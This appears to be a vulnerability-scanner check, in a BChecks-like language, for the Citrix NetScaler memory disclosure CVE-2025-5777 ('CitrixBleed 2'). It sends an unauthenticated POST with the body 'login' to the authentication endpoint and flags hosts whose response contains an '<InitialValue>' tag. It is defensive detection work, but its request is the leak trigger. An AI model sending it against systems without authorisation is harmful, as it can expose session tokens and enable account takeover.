metadata:
    language: v1-beta
    name: "CVE-2025-5777 Citrix NetScaler - Memory Disclosure"
    description: "Check for CVE-2025-5777 CitrixBleed 2 vulnerability"
    author: "CyberTechAjju"
    tags: "CVE-2025-5777","citrix","netscaler","memory-disclosure","unauth"

define:
    auth_path = "/p/u/doAuthentication.do"
    payload_data = "login"

given host then
    send request called check1:
        method: "POST"
        path: {auth_path}
        body: {payload_data}
        
    if {check1.response.status_code} is "200" and "application/vnd.citrix.authenticateresponse" in {check1.response.headers} then
        if "<InitialValue>" in {check1.response.body} then
            report issue:
                severity: high
                confidence: certain
                detail: "Citrix NetScaler is vulnerable to CVE-2025-5777 memory disclosure. Sensitive data including session tokens can be leaked through authentication response."
                remediation: "Upgrade NetScaler firmware to the latest patched version immediately. Review access logs for signs of exploitation."
        end if
    end if